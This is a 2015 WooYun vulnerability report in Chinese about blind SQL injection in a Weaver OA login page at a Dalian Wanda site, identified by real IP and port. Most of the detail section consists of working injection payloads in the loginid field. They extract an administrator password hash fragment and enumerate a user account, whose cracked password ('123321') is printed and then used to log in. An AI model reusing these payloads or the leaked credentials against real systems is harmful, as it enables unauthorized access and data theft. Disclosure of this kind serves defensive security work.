当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134122

漏洞标题:大连万达集团股份有限公司某站存在SQL注入

相关厂商:大连万达集团股份有限公司

漏洞作者: 浮萍

提交时间:2015-08-14 15:35

修复时间:2015-10-01 15:40

公开时间:2015-10-01 15:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-14: 细节已通知厂商并且等待厂商处理中
2015-08-17: 厂商已经确认,细节仅向厂商公开
2015-08-27: 细节向核心白帽子及相关领域专家公开
2015-09-06: 细节向普通白帽子公开
2015-09-16: 细节向实习白帽子公开
2015-10-01: 细节向公众公开

简要描述:

SQL注入

详细说明:

泛微的OA
http://60.10.8.227:89/login.do

Snap1.jpg


当输入不存在的用户名时会提示用户未找到(103)
且网页跳转到http://60.10.8.227:89/login.do?message=103&verify=页面
当输入一个存在的用户名时 如sysadmin
会提示错误: 登录密码不正确(102)

Snap2.jpg


用户名输入sysadmin'and'1'='1
提示 登录密码不正确(102) 

loginid=sysadmin' and substring(loginid,1,1) ='s' and 'a' ='a&password=a&clienttype=Webclient&clientver=4.5&language=&country=&verify=


Snap3.jpg


sysadmin' and len(password)=32 and  'a' ='a


Snap5.jpg


存在password字段 且长度为32
已知密码为md5加密
这里取9-24位

sysadmin' and(substring(password,9,1)='1') and 'a'='a
sysadmin' and(substring(password,10,1)='4') and 'a'='a
sysadmin' and(substring(password,11,1)='e') and 'a'='a
sysadmin' and(substring(password,12,1)='b') and 'a'='a
sysadmin' and(substring(password,13,1)='1') and 'a'='a
sysadmin' and(substring(password,14,1)='e') and 'a'='a
sysadmin' and(substring(password,15,1)='a') and 'a'='a
sysadmin' and(substring(password,16,1)='c') and 'a'='a
sysadmin' and(substring(password,17,1)='5') and 'a'='a
sysadmin' and(substring(password,18,1)='8') and 'a'='a
sysadmin' and(substring(password,19,1)='a') and 'a'='a
sysadmin' and(substring(password,20,1)='1') and 'a'='a
sysadmin' and(substring(password,21,1)='f') and 'a'='a
sysadmin' and(substring(password,22,1)='4') and 'a'='a
sysadmin' and(substring(password,23,1)='8') and 'a'='a
sysadmin' and(substring(password,24,1)='f') and 'a'='a


sysadmin' and substring(password,9,16)='14eb1eac58a1f48f' and 'a' ='a
则sysadmin对应密码的md5为14eb1eac58a1f48f
未解密成功

漏洞证明:

再来找一个用户

a'or len(loginid)=3 and substring(loginid,1,1)='l' 
a'or len(loginid)=3 and substring(loginid,1,1)='l' and substring(loginid,2,1)='z' and 'a'='a
a'or len(loginid)=3 and substring(loginid,1,1)='l' and substring(loginid,2,1)='z' and substring(loginid,3,1)='e' and 'a'='a


找到一个用户 lze
然后通过上述方法找到密码

ff8aaa8a2dde9154


经解密是123321
登录提示错误: 用户没有权限登录手机版本(110)
这个系统和http://60.10.8.227:88/login/Login.jsp?logintype=1用户名密码通用
我们使用lze 123321
登录

Snap6.jpg


Snap7.jpg


Snap8.jpg


Snap9.jpg


修复方案:

版权声明:转载请注明来源 浮萍@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-17 15:38

厂商回复:

感谢浮萍同学的关注与贡献,马上通知业务整改!

最新状态:

暂无